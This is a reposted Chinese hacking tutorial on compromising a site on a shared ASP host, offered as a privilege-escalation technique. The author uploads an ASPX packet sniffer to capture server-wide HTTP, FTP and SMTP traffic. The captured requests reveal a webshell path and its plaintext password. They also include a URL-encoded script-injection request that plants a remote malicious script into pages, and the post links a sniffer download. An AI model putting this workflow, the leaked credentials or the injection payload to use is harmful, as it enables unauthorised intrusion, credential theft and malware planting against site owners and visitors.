邮箱:service@hongdaqianqiu.com
是小白搞的,但是当时她没截图,所以我重新来的,时间就有点对不上,不过确实是这么个步骤哈
首先是嗅探工具,asp的虚拟一般都支持aspx(少数不支持的忽略哈),那么用C#调用winsock嗅探下80端口、顺便连ftp和SMTP端口一起监听了吧。
第一步,随便旁注拿下asp虚拟主机上的一个网站,上传aspx的工具(工具我下载链接在本文末尾)如图:
这个虚拟主机还算不错,才三分钟,就Packets: 260这么多包了
一个通宵抓包,好了,该分析日志了。
日志下载下来,因为虚拟主机,监听的是整个服务器,信息量太大,只能有选择的分析,搜索admin、pass、user、login等等有选择的看包。
从抓包中发现,很多人在暴力猜解ftp密码。。。晕,这是何苦呢
搜索admin这一关键词时有这么一个部分引起了我的注意,如图:
目录是admin下的文件,而且还有Cookie。。。很明显。呵呵
再看往下:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
POST: /Admin/sent.asp HTTP/1.1
Via: 1.0 PROXY
Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG
Referer: http://www.91ri.org /Admin/sent.asp
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.cntansu.com
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: zh-cn
UA-CPU: x86
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 13
pass=buqiuren
|
慢慢来看,无关的跳过了哈
|
1
|
POST: /Admin/sent.asp
|
发送指令到admin目录的sent.asp
|
1
|
Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG
|
这个不用解释了吧,用session,session似乎不能像Cookie那样欺骗,能我也不会
|
1
|
Referer: http://www.91ri.org /Admin/sent.asp
|
完整的url估计就是这个不错了,打开看看。居然是webshell
这下就更省事了
好了,继续往下看:
|
1
|
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
|
反正不是我机器上的
下面的越看越无聊,直接跳到最后:
|
1
|
pass=buqiuren
|
输入密码:buqiuren即可登录
下面就是批量清马,清理找webshell了
PS:做人要积德,挂马盗号这样的无德无良的事情最好不要干,修复漏洞,留张条就行了。罪过啊罪过
look,挂马的信息也抓出来了。。。。好无聊
|
1
2
3
4
5
6
7
8
9
10
11
12
13
|
POST /Admin/sent.asp?Action=plgm&code=<script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46></script> HTTP/1.1
Via: 1.0 PROXY
Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG
Referer: http://www.cntansu.com/Admin/sent.asp?Action=plgm&code=<script%20src=http://www.91ri.org > /script>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.91ri.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: zh-cn
UA-CPU: x86
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 153
|
91ri.org:这是篇很老的文章了,其实从技术上来说没什么很有趣的东西,也挺老套的。之所以转载这篇文章是想给大家分享个思路:如果在旁注的时候跨目录没权限,提权无望的情况下可以试试这种嗅探方式,可以嗅探到服务器上的ftp登录以及一些敏感信息,运气好时你嗅探到的信息将成为你拿下目标站的关键key…
sniffer aspx下载:http://pan.baidu.com/share/link?shareid=474204&uk=1325491136
注:这个shell是网上找的,手上没有shell就不测试了,手上有shell的下载下来测试一下效果,如果发现不能用可以留言,我另外台电脑里是有这个的可用版。
link:http://bbs.blackbap.org/thread-1323-1-1.html
本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号
